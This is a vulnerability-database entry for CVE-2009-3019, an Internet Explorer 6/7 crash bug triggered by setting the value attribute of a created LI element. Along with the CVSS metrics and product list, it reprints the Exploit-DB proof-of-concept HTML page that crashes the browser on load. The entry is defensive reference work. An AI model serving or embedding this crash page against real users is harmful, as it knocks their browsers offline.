CVE-2009-3019 : Detail

CVE-2009-3019

Code Injection
A03-Injection
9.82%V4
Network
2009-08-31
14h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 9455

Publication date : 2009-08-17 22h00 +00:00
Author : Irfan Asrar
EDB Verified : Yes

<html> <head> <title> Irfan Asrar</title> </head> <body onload="c()"> Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 <script type="text/javascript"> function c() { var li = document.createElement("li"); li.setAttribute("value", "1"); li.value = "1"; } </script> </body> </html> # milw0rm.com [2009-08-18]

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Configuraton 0

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Windows_vista >> Version *

References

http://www.exploit-db.com/exploits/9455
Tags : exploit, x_refsource_EXPLOIT-DB